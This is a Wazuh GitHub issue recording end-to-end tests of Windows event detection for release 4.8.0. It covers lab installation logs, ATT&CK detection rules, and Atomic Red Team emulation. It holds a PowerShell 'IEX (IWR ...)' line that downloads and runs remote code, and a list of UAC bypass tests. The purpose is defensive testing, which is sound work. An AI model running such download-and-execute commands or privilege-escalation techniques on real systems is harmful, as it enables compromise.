wazuh / wazuh

Wazuh - The Open Source Security Platform. Unified XDR and SIEM protection for endpoints and cloud workloads.
https://wazuh.com/

Release 4.8.0 - Beta 2 - E2E UX tests - Windows events #22112

Closed davidjiglesias closed 6 months ago

davidjiglesias commented 6 months ago

End-to-End (E2E) Testing Guideline

For the conclusions and the issue testing and updates, use the following legend:

Status legend

Issue delivery and completion

Deployment requirements

| Component | Installation | Type | OS |
|---|---|---|---|
| Indexer | Installation assistant | Single node | Oracle Linux 9 x86_64 |
| Server | Installation assistant | Multi node | Oracle Linux 9 x86_64 |
| Dashboard | Installation assistant | - | Oracle Linux 9 x86_64 |
| Agent | Wazuh WUI one-liner deploy using IP and GROUP (created beforehand, don't use default) | - | Windows Server 2022 x86_64, Windows 11 x86_64 |

Test description

Test that Windows data collection works out of the box. Check that for the same Windows events, the alert rule IDs are the same as in the previous version. Test the following blog post: https://wazuh.com/blog/emulation-of-attck-techniques-and-detection-with-wazuh/. Install Sysmon and create Wazuh rules as mentioned, to ensure that everything works as intended in the blog post (use the current release under test instead of 4.2.0). Use the blog post as a mere guide for testing some Windows events and the use cases; do not report issues with the blog post itself, outdated commands, etc.

Known issues

Conclusions

I have met the end of the test without any possible issue.

Feedback

We value your feedback. Please provide insights on your testing experience.

Reviewers validation

The criteria for completing this task are based on the validation of the conclusions and the test results by all reviewers.

All the checkboxes below must be marked in order to close this issue.

LucioDonda commented 6 months ago

Environment setup

Host information

Server wazuh-1 [192.168.56.34]

```shell
[root@vm-oracle9 vagrant]# cat /etc/os-release
NAME="Oracle Linux Server"
VERSION="9.3"
ID="ol"
ID_LIKE="fedora"
VARIANT="Server"
VARIANT_ID="server"
VERSION_ID="9.3"
PLATFORM_ID="platform:el9"
PRETTY_NAME="Oracle Linux Server 9.3"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:oracle:linux:9:3:server"
HOME_URL="https://linux.oracle.com/"
BUG_REPORT_URL="https://github.com/oracle/oracle-linux"
ORACLE_BUGZILLA_PRODUCT="Oracle Linux 9"
ORACLE_BUGZILLA_PRODUCT_VERSION=9.3
ORACLE_SUPPORT_PRODUCT="Oracle Linux"
ORACLE_SUPPORT_PRODUCT_VERSION=9.3
```

```shell
[root@vm-oracle9 vagrant]# lscpu
Architecture:             x86_64
  CPU op-mode(s):         32-bit, 64-bit
  Address sizes:          48 bits physical, 48 bits virtual
  Byte Order:             Little Endian
CPU(s):                   4
  On-line CPU(s) list:    0-3
Vendor ID:                AuthenticAMD
  Model name:             AMD Ryzen 5 4500U with Radeon Graphics
    CPU family:           23
    Model:                96
    Thread(s) per core:   1
    Core(s) per socket:   4
    Socket(s):            1
    Stepping:             1
    BogoMIPS:             4741.09
    Flags:                fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch ssbd vmmcall fsgsbase bmi1 avx2 bmi2 rdseed clflushopt arat
Virtualization features:
  Hypervisor vendor:      KVM
  Virtualization type:    full
Caches (sum of all):
  L1d:                    128 KiB (4 instances)
  L1i:                    128 KiB (4 instances)
  L2:                     2 MiB (4 instances)
  L3:                     32 MiB (4 instances)
NUMA:
  NUMA node(s):           1
  NUMA node0 CPU(s):      0-3
Vulnerabilities:
  Gather data sampling:   Not affected
  Itlb multihit:          Not affected
  L1tf:                   Not affected
  Mds:                    Not affected
  Meltdown:               Not affected
  Mmio stale data:        Not affected
  Retbleed:               Mitigation; untrained return thunk; SMT disabled
  Spec rstack overflow:   Vulnerable: Safe RET, no microcode
  Spec store bypass:      Not affected
  Spectre v1:             Mitigation; usercopy/swapgs barriers and __user pointer sanitization
  Spectre v2:             Mitigation; Retpolines, STIBP disabled, RSB filling, PBRSB-eIBRS Not affected
  Srbds:                  Not affected
  Tsx async abort:        Not affected
```

```shell
[root@vm-oracle9 vagrant]# free
               total        used        free      shared  buff/cache   available
Mem:          971500      366752      594204        5340      164456      604748
Swap:              0           0           0
```

```shell
[root@vm-oracle9 vagrant]# lsblk
NAME                MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
sda                   8:0    0  128G  0 disk
├─sda1                8:1    0    1G  0 part /boot
└─sda2                8:2    0  127G  0 part
  └─ol_oracle9-root 253:0    0   70G  0 lvm  /
```

Server 2 [192.168.56.32]

```shell
[vagrant@vm-oracle9 ~]$ cat /etc/*release
Oracle Linux Server release 9.3
NAME="Oracle Linux Server"
VERSION="9.3"
ID="ol"
ID_LIKE="fedora"
VARIANT="Server"
VARIANT_ID="server"
VERSION_ID="9.3"
PLATFORM_ID="platform:el9"
PRETTY_NAME="Oracle Linux Server 9.3"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:oracle:linux:9:3:server"
HOME_URL="https://linux.oracle.com/"
BUG_REPORT_URL="https://github.com/oracle/oracle-linux"
ORACLE_BUGZILLA_PRODUCT="Oracle Linux 9"
ORACLE_BUGZILLA_PRODUCT_VERSION=9.3
ORACLE_SUPPORT_PRODUCT="Oracle Linux"
ORACLE_SUPPORT_PRODUCT_VERSION=9.3
Red Hat Enterprise Linux release 9.3 (Plow)
Oracle Linux Server release 9.3
```

```shell
[vagrant@vm-oracle9 ~]$ lscpu
Architecture:             x86_64
  CPU op-mode(s):         32-bit, 64-bit
  Address sizes:          48 bits physical, 48 bits virtual
  Byte Order:             Little Endian
CPU(s):                   4
  On-line CPU(s) list:    0-3
Vendor ID:                AuthenticAMD
  Model name:             AMD Ryzen 5 4500U with Radeon Graphics
    CPU family:           23
    Model:                96
    Thread(s) per core:   1
    Core(s) per socket:   4
    Socket(s):            1
    Stepping:             1
    BogoMIPS:             4741.09
    Flags:                fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch ssbd vmmcall fsgsbase bmi1 avx2 bmi2 rdseed clflushopt arat
Virtualization features:
  Hypervisor vendor:      KVM
  Virtualization type:    full
Caches (sum of all):
  L1d:                    128 KiB (4 instances)
  L1i:                    128 KiB (4 instances)
  L2:                     2 MiB (4 instances)
  L3:                     32 MiB (4 instances)
NUMA:
  NUMA node(s):           1
  NUMA node0 CPU(s):      0-3
Vulnerabilities:
  Gather data sampling:   Not affected
  Itlb multihit:          Not affected
  L1tf:                   Not affected
  Mds:                    Not affected
  Meltdown:               Not affected
  Mmio stale data:        Not affected
  Retbleed:               Mitigation; untrained return thunk; SMT disabled
  Spec rstack overflow:   Vulnerable: Safe RET, no microcode
  Spec store bypass:      Not affected
  Spectre v1:             Mitigation; usercopy/swapgs barriers and __user pointer sanitization
  Spectre v2:             Mitigation; Retpolines, STIBP disabled, RSB filling, PBRSB-eIBRS Not affected
  Srbds:                  Not affected
  Tsx async abort:        Not affected
```

```shell
[vagrant@vm-oracle9 ~]$ free
               total        used        free      shared  buff/cache   available
Mem:          971500      325200      648712        5352      142820      646300
Swap:              0           0           0
```

```shell
[vagrant@vm-oracle9 ~]$ lsblk
NAME                MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
sda                   8:0    0  128G  0 disk
├─sda1                8:1    0    1G  0 part /boot
└─sda2                8:2    0  127G  0 part
  └─ol_oracle9-root 253:0    0   70G  0 lvm  /
```

Indexer / Dashboard [192.168.56.35]

```shell
[root@vm-oracle9 vagrant]# cat /etc/*release
Oracle Linux Server release 9.3
NAME="Oracle Linux Server"
VERSION="9.3"
ID="ol"
ID_LIKE="fedora"
VARIANT="Server"
VARIANT_ID="server"
VERSION_ID="9.3"
PLATFORM_ID="platform:el9"
PRETTY_NAME="Oracle Linux Server 9.3"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:oracle:linux:9:3:server"
HOME_URL="https://linux.oracle.com/"
BUG_REPORT_URL="https://github.com/oracle/oracle-linux"
ORACLE_BUGZILLA_PRODUCT="Oracle Linux 9"
ORACLE_BUGZILLA_PRODUCT_VERSION=9.3
ORACLE_SUPPORT_PRODUCT="Oracle Linux"
ORACLE_SUPPORT_PRODUCT_VERSION=9.3
Red Hat Enterprise Linux release 9.3 (Plow)
Oracle Linux Server release 9.3
```

```shell
[root@vm-oracle9 vagrant]# lscpu
Architecture:             x86_64
  CPU op-mode(s):         32-bit, 64-bit
  Address sizes:          48 bits physical, 48 bits virtual
  Byte Order:             Little Endian
CPU(s):                   4
  On-line CPU(s) list:    0-3
Vendor ID:                AuthenticAMD
  Model name:             AMD Ryzen 5 4500U with Radeon Graphics
    CPU family:           23
    Model:                96
    Thread(s) per core:   1
    Core(s) per socket:   4
    Socket(s):            1
    Stepping:             1
    BogoMIPS:             4741.09
    Flags:                fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch ssbd vmmcall fsgsbase bmi1 avx2 bmi2 rdseed clflushopt arat
Virtualization features:
  Hypervisor vendor:      KVM
  Virtualization type:    full
Caches (sum of all):
  L1d:                    128 KiB (4 instances)
  L1i:                    128 KiB (4 instances)
  L2:                     2 MiB (4 instances)
  L3:                     32 MiB (4 instances)
NUMA:
  NUMA node(s):           1
  NUMA node0 CPU(s):      0-3
Vulnerabilities:
  Gather data sampling:   Not affected
  Itlb multihit:          Not affected
  L1tf:                   Not affected
  Mds:                    Not affected
  Meltdown:               Not affected
  Mmio stale data:        Not affected
  Retbleed:               Mitigation; untrained return thunk; SMT disabled
  Spec rstack overflow:   Vulnerable: Safe RET, no microcode
  Spec store bypass:      Not affected
  Spectre v1:             Mitigation; usercopy/swapgs barriers and __user pointer sanitization
  Spectre v2:             Mitigation; Retpolines, STIBP disabled, RSB filling, PBRSB-eIBRS Not affected
  Srbds:                  Not affected
  Tsx async abort:        Not affected
```

```shell
[root@vm-oracle9 vagrant]# free
               total        used        free      shared  buff/cache   available
Mem:          971500      328348      645556        5336      142824      643152
Swap:              0           0           0
```

```shell
[root@vm-oracle9 vagrant]# lsblk
NAME                MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
sda                   8:0    0  128G  0 disk
├─sda1                8:1    0    1G  0 part /boot
└─sda2                8:2    0  127G  0 part
  └─ol_oracle9-root 253:0    0   70G  0 lvm  /
```

Agent Windows Server 2022

![VirtualBox_wazuh_vms_winServer22_1708953133611_54303_27_02_2024_10_09_59](https://github.com/wazuh/wazuh/assets/95248059/ab10e865-e160-4e7d-a72e-5f1a9b3b9558)

Agent Windows 11

![Screenshot 2024-02-27 034151](https://github.com/wazuh/wazuh/assets/95248059/0a7afa84-278f-41b7-a26e-58f4ebfa8154)
LucioDonda commented 6 months ago

Installation 🟒

Indexer / Dashboard [192.168.56.35]

```shell
curl -sO https://packages-dev.wazuh.com/4.8/wazuh-install.sh
curl -sO https://packages-dev.wazuh.com/4.8/config.yml
```

config file:

```yaml
nodes:
  # Wazuh indexer nodes
  indexer:
    - name: node-1
      ip: 192.168.56.35

  # Wazuh server nodes
  server:
    - name: wazuh-1
      ip: 192.168.56.34
      node_type: master
    - name: wazuh-2
      ip: 192.168.56.32
      node_type: worker

  # Wazuh dashboard nodes
  dashboard:
    - name: dashboard
      ip: 192.168.56.35
```

Generating config files

```shell
[root@vm-oracle9 vagrant]# bash wazuh-install.sh --generate-config-files -i
26/02/2024 17:56:08 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0
26/02/2024 17:56:08 INFO: Verbose logging redirected to /var/log/wazuh-install.log
26/02/2024 17:56:16 WARNING: Hardware and system checks ignored.
26/02/2024 17:56:16 INFO: --- Configuration files ---
26/02/2024 17:56:16 INFO: Generating configuration files.
26/02/2024 17:56:16 INFO: Generating the root certificate.
26/02/2024 17:56:17 INFO: Generating Admin certificates.
26/02/2024 17:56:17 INFO: Generating Wazuh indexer certificates.
26/02/2024 17:56:17 INFO: Generating Filebeat certificates.
26/02/2024 17:56:18 INFO: Generating Wazuh dashboard certificates.
26/02/2024 17:56:18 INFO: Created wazuh-install-files.tar. It contains the Wazuh cluster key, certificates, and passwords necessary for installation.
```

Installation

```shell
[root@vm-oracle9 vagrant]# bash wazuh-install.sh --wazuh-indexer node-1 -i -o
26/02/2024 19:06:37 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0
26/02/2024 19:06:37 INFO: Verbose logging redirected to /var/log/wazuh-install.log
26/02/2024 19:06:45 WARNING: Hardware and system checks ignored.
26/02/2024 19:06:46 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on these ports: 9200, 9300.
26/02/2024 19:06:48 INFO: Wazuh development repository added.
26/02/2024 19:06:49 INFO: --- Wazuh indexer ---
26/02/2024 19:06:49 INFO: Starting Wazuh indexer installation.
26/02/2024 19:13:43 INFO: Wazuh indexer installation finished.
26/02/2024 19:13:43 INFO: Wazuh indexer post-install configuration finished.
26/02/2024 19:13:43 INFO: Starting service wazuh-indexer.
26/02/2024 19:13:57 INFO: wazuh-indexer service started.
26/02/2024 19:13:57 INFO: Initializing Wazuh indexer cluster security settings.
26/02/2024 19:14:00 INFO: Wazuh indexer cluster initialized.
26/02/2024 19:14:00 INFO: Installation finished.
```

Start cluster

```shell
[root@vm-oracle9 vagrant]# bash wazuh-install.sh --start-cluster -i
26/02/2024 19:19:16 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0
26/02/2024 19:19:16 INFO: Verbose logging redirected to /var/log/wazuh-install.log
26/02/2024 19:19:23 WARNING: Hardware and system checks ignored.
26/02/2024 19:19:33 INFO: Wazuh indexer cluster security configuration initialized.
26/02/2024 19:20:02 INFO: Updating the internal users.
26/02/2024 19:20:05 INFO: A backup of the internal users has been saved in the /etc/wazuh-indexer/internalusers-backup folder.
26/02/2024 19:20:13 INFO: Wazuh indexer cluster started.
```

Confirm installation and cluster

```shell
[root@vm-oracle9 vagrant]# curl -k -u admin:############ https://192.168.56.35:9200
{
  "name" : "node-1",
  "cluster_name" : "wazuh-indexer-cluster",
  "cluster_uuid" : "-s56LeitS2O2gJ3ZhwqiVg",
  "version" : {
    "number" : "7.10.2",
    "build_type" : "rpm",
    "build_hash" : "eee49cb340edc6c4d489bcd9324dda571fc8dc03",
    "build_date" : "2023-09-20T23:54:29.889267151Z",
    "build_snapshot" : false,
    "lucene_version" : "9.7.0",
    "minimum_wire_compatibility_version" : "7.10.0",
    "minimum_index_compatibility_version" : "7.0.0"
  },
  "tagline" : "The OpenSearch Project: https://opensearch.org/"
}
[root@vm-oracle9 vagrant]# curl -k -u admin:############ https://192.168.56.35:9200/_cat/nodes?v
ip            heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles                                cluster_manager name
192.168.56.35           12          94   3    0.07    0.13     0.10 dimr      data,ingest,master,remote_cluster_client *               node-1
```

Server wazuh-1 [192.168.56.34]

disabling some ports on firewall

```shell
[root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1514/tcp
success
[root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1515/tcp
success
[root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1516/tcp
success
[root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=55000/tcp
success
[root@vm-oracle9 vagrant]# firewall-cmd --reload
success
[root@vm-oracle9 vagrant]# firewall-cmd --zone=public --list-ports
1514/tcp 1515/tcp 1516/tcp 55000/tcp
```

installing

```shell
[root@vm-oracle9 vagrant]# bash wazuh-install.sh --wazuh-server wazuh-1 -i
26/02/2024 19:54:16 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0
26/02/2024 19:54:16 INFO: Verbose logging redirected to /var/log/wazuh-install.log
26/02/2024 19:54:23 WARNING: Hardware and system checks ignored.
26/02/2024 19:54:24 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on these ports: 1514, 1515, 1516, 55000.
26/02/2024 19:54:27 INFO: Wazuh development repository added.
26/02/2024 19:54:27 INFO: --- Wazuh server ---
26/02/2024 19:54:27 INFO: Starting the Wazuh manager installation.
26/02/2024 19:57:13 INFO: Wazuh manager installation finished.
26/02/2024 19:57:13 INFO: Wazuh manager vulnerability detection configuration finished.
26/02/2024 19:57:13 INFO: Starting service wazuh-manager.
26/02/2024 19:57:23 INFO: wazuh-manager service started.
26/02/2024 19:57:23 INFO: Starting Filebeat installation.
26/02/2024 19:58:08 INFO: Filebeat installation finished.
26/02/2024 19:58:14 INFO: Filebeat post-install configuration finished.
26/02/2024 19:58:49 INFO: Starting service filebeat.
26/02/2024 19:58:50 INFO: filebeat service started.
26/02/2024 19:58:50 INFO: Installation finished.
```

checking installation

```shell
[root@vm-oracle9 vagrant]# systemctl status wazuh-manager.service
● wazuh-manager.service - Wazuh manager
     Loaded: loaded (/usr/lib/systemd/system/wazuh-manager.service; enabled; preset: disabled)
     Active: active (running) since Mon 2024-02-26 19:58:47 UTC; 13s ago
      Tasks: 154 (limit: 24732)
     Memory: 680.6M
        CPU: 23.649s
     CGroup: /system.slice/wazuh-manager.service
             ├─8080 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py
             ├─8081 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py
             ├─8084 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py
             ├─8087 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py
             ├─8129 /var/ossec/bin/wazuh-authd
             ├─8147 /var/ossec/bin/wazuh-db
             ├─8175 /var/ossec/bin/wazuh-execd
             ├─8189 /var/ossec/bin/wazuh-analysisd
             ├─8199 /var/ossec/bin/wazuh-syscheckd
             ├─8214 /var/ossec/bin/wazuh-remoted
             ├─8284 /var/ossec/bin/wazuh-logcollector
             ├─8301 /var/ossec/bin/wazuh-monitord
             ├─8311 /var/ossec/bin/wazuh-modulesd
             ├─8934 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_clusterd>
             ├─8945 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_clusterd>
             └─8946 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_clusterd>
```

Server 2 [192.168.56.32]

Disabling firewall on some ports

```shell
[root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1514/tcp
success
[root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1515/tcp
success
[root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1516/tcp
success
[root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=55000/tcp
success
[root@vm-oracle9 vagrant]# firewall-cmd --reload
success
[root@vm-oracle9 vagrant]# firewall-cmd --zone=public --list-ports
1514/tcp 1515/tcp 1516/tcp 55000/tcp
```

Installing

```shell
[root@vm-oracle9 vagrant]# bash wazuh-install.sh --wazuh-server wazuh-2 -i
26/02/2024 20:14:17 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0
26/02/2024 20:14:17 INFO: Verbose logging redirected to /var/log/wazuh-install.log
26/02/2024 20:14:24 WARNING: Hardware and system checks ignored.
26/02/2024 20:14:25 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on these ports: 1514, 1515, 1516, 55000.
26/02/2024 20:14:28 INFO: Wazuh development repository added.
26/02/2024 20:14:28 INFO: --- Wazuh server ---
26/02/2024 20:14:28 INFO: Starting the Wazuh manager installation.
26/02/2024 20:19:52 INFO: Wazuh manager installation finished.
26/02/2024 20:19:53 INFO: Wazuh manager vulnerability detection configuration finished.
26/02/2024 20:19:53 INFO: Starting service wazuh-manager.
26/02/2024 20:20:06 INFO: wazuh-manager service started.
26/02/2024 20:20:06 INFO: Starting Filebeat installation.
26/02/2024 20:21:27 INFO: Filebeat installation finished.
26/02/2024 20:21:30 INFO: Filebeat post-install configuration finished.
26/02/2024 20:22:02 INFO: Starting service filebeat.
26/02/2024 20:22:03 INFO: filebeat service started.
26/02/2024 20:22:03 INFO: Installation finished.
```

Checking installation

```shell
[root@vm-oracle9 vagrant]# systemctl status wazuh-manager.service
● wazuh-manager.service - Wazuh manager
     Loaded: loaded (/usr/lib/systemd/system/wazuh-manager.service; enabled; preset: disabled)
     Active: active (running) since Mon 2024-02-26 20:22:02 UTC; 2min 43s ago
      Tasks: 171 (limit: 5819)
     Memory: 609.1M
        CPU: 37.044s
     CGroup: /system.slice/wazuh-manager.service
             ├─ 9521 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py
             ├─ 9522 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py
             ├─ 9525 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py
             ├─ 9528 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py
             ├─ 9570 /var/ossec/bin/wazuh-authd
             ├─ 9583 /var/ossec/bin/wazuh-db
             ├─ 9609 /var/ossec/bin/wazuh-execd
             ├─ 9621 /var/ossec/bin/wazuh-analysisd
             ├─ 9631 /var/ossec/bin/wazuh-syscheckd
             ├─ 9646 /var/ossec/bin/wazuh-remoted
             ├─ 9731 /var/ossec/bin/wazuh-logcollector
             ├─ 9750 /var/ossec/bin/wazuh-monitord
             ├─ 9760 /var/ossec/bin/wazuh-modulesd
             ├─10407 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_cluster>
             └─10973 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_cluster>

Feb 26 20:21:54 vm-oracle9 env[9465]: Started wazuh-syscheckd...
Feb 26 20:21:55 vm-oracle9 env[9465]: Started wazuh-remoted...
Feb 26 20:21:56 vm-oracle9 env[9465]: Started wazuh-logcollector...
Feb 26 20:21:56 vm-oracle9 env[9465]: Started wazuh-monitord...
Feb 26 20:21:56 vm-oracle9 env[9758]: 2024/02/26 20:21:56 wazuh-modulesd:router: INFO: Loaded router mo>
Feb 26 20:21:56 vm-oracle9 env[9758]: 2024/02/26 20:21:56 wazuh-modulesd:content_manager: INFO: Loaded >
Feb 26 20:21:57 vm-oracle9 env[9465]: Started wazuh-modulesd...
Feb 26 20:22:00 vm-oracle9 env[9465]: Started wazuh-clusterd...
Feb 26 20:22:02 vm-oracle9 env[9465]: Completed.
Feb 26 20:22:02 vm-oracle9 systemd[1]: Started Wazuh manager.
```

Dashboard

```shell
-rw-r--r--. 1 root root 177691 Feb 26 17:59 wazuh-install.sh
[root@vm-oracle9 vagrant]# bash wazuh-install.sh --wazuh-dashboard dashboard -i
26/02/2024 20:29:26 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0
26/02/2024 20:29:26 INFO: Verbose logging redirected to /var/log/wazuh-install.log
26/02/2024 20:29:34 WARNING: Hardware and system checks ignored.
26/02/2024 20:29:34 INFO: Wazuh web interface port will be 443.
26/02/2024 20:29:35 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on this port: 443.
26/02/2024 20:29:37 INFO: Wazuh development repository added.
26/02/2024 20:29:38 INFO: --- Wazuh dashboard ----
26/02/2024 20:29:38 INFO: Starting Wazuh dashboard installation.
26/02/2024 20:36:58 INFO: Wazuh dashboard installation finished.
26/02/2024 20:36:58 INFO: Wazuh dashboard post-install configuration finished.
26/02/2024 20:36:58 INFO: Starting service wazuh-dashboard.
26/02/2024 20:36:58 INFO: wazuh-dashboard service started.
26/02/2024 20:37:20 INFO: Initializing Wazuh dashboard web application.
26/02/2024 20:37:21 INFO: Wazuh dashboard web application initialized.
26/02/2024 20:37:21 INFO: --- Summary ---
26/02/2024 20:37:21 INFO: You can access the web interface https://192.168.56.35:443
    User: admin
    Password: ###########
26/02/2024 20:37:21 INFO: Installation finished.
```

![Screenshot from 2024-02-26 17-48-54](https://github.com/wazuh/wazuh/assets/95248059/2b17afaa-6a3a-426d-9d90-6744ba399dc1)

Agents

Installation

![Screenshot from 2024-02-26 18-09-58](https://github.com/wazuh/wazuh/assets/95248059/c248e2ce-47bd-4114-a696-fa86f6a1e7f3)

![Screenshot from 2024-02-26 18-10-05](https://github.com/wazuh/wazuh/assets/95248059/5346ddd1-ff79-463f-aa91-e4903f82c2dc)

Agent 1

```powershell
PS C:\Users\vagrant>
>> Invoke-WebRequest -Uri https://packages-dev.wazuh.com/pre-release/windows/wazuh-agent-4.8.0-1.msi -OutFile ${env.tmp}\wazuh-agent; msiexec.exe /i ${env.tmp}\wazuh-agent /q WAZUH_MANAGER='192.168.56.34'
PS C:\Users\vagrant> NET START WazuhSvc
The Wazuh service is starting.
The Wazuh service was started successfully.
```

Agent 2

```powershell
PS C:\Users\vagrant> Invoke-WebRequest -Uri https://packages-dev.wazuh.com/pre-release/windows/wazuh-agent-4.8.0-1.msi -OutFile ${env.tmp}\wazuh-agent; msiexec.exe /i ${env.tmp}\wazuh-agent /q WAZUH_MANAGER='192.168.56.34'
PS C:\Users\vagrant> NET START WazuhSvc
The Wazuh service is starting.
The Wazuh service was started successfully.
```

![Screenshot from 2024-02-27 10-18-42](https://github.com/wazuh/wazuh/assets/95248059/26cc2850-5fb4-4011-8a21-a8979a67b7c5)

LucioDonda commented 6 months ago

Emulation of ATT&CK techniques and detection with Wazuh

Setting up the environment [Server] 🟒

Add Rule

Modifying local_rules.xml

```console
windows
technique_id=T1053,technique_name=Scheduled Task
A Newly Scheduled Task has been Detected on $(win.system.computer)
T1053

windows
technique_id=T1073,technique_name=DLL Side-Loading
DLL Side-Loading Detected on $(win.system.computer)
T1073
T1574.002

windows
technique_id=T1218.010,technique_name=Regsvr32
Signed Binary Proxy Execution using Regsvr32 Detected on $(win.system.computer)
T1218
T1117

windows
technique_id=T1518.001,technique_name=Security Software Discovery
Security Software Discovery Attempt has been Detected on $(win.system.computer)
T1518

windows
technique_id=T1548.002,technique_name=Bypass User Access Control
Privilege Escalation Through Bypass of UAC has been Detected on $(win.system.computer)
T1548.002
T1088
```

Setting up the environment [Agent windows 11] 🟒

Sysmon configuration

Mapping Sysmon rules with MITRE attack techniques

```console
```

Capture Sysmon 🟒

Modify ossec.conf

```console
Microsoft-Windows-Sysmon/Operational
eventchannel
```

Atomic Red Team installation

ART Execution Framework and Atomics folder installation

```console
PS C:\Users\vagrant\Sysmon> IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
PS C:\Users\vagrant\Sysmon> Install-AtomicRedTeam -getAtomics
Installation of Invoke-AtomicRedTeam is complete. You can now use the Invoke-AtomicTest function
See Wiki at https://github.com/redcanaryco/invoke-atomicredteam/wiki for complete details
```

Importing the ART module

```console
PS C:\Users\vagrant\Sysmon> Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force
```

Get details of a particular technique

```console
PS C:\Users\vagrant\Sysmon>
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -ShowDetailsBrief
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

T1548.002-1 Bypass UAC using Event Viewer (cmd
T1548.002-2 Bypass UAC using Event Viewer (PowerShell
T1548.002-3 Bypass UAC using Fodhelper
T1548.002-4 Bypass UAC using Fodhelper - PowerShell
T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell
T1548.002-6 Bypass UAC by Mocking Trusted Directories
T1548.002-7 Bypass UAC using sdclt DelegateExecute
T1548.002-8 Disable UAC using reg.exe
T1548.002-9 Bypass UAC using SilentCleanup task
T1548.002-10 UACME Bypass Method 23
T1548.002-11 UACME Bypass Method 31
T1548.002-12 UACME Bypass Method 33
T1548.002-13 UACME Bypass Method 34
T1548.002-14 UACME Bypass Method 39
T1548.002-15 UACME Bypass Method 56
T1548.002-16 UACME Bypass Method 59
T1548.002-17 UACME Bypass Method 61
T1548.002-18 WinPwn - UAC Magic
T1548.002-19 WinPwn - UAC Bypass ccmstp technique
T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
T1548.002-23 UAC Bypass with WSReset Registry Modification
T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
T1548.002-25 Disable UAC notification via registry keys
T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```

Check/Get prerequisites of a technique

```console
PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd
Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd
CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell
Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell
CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper
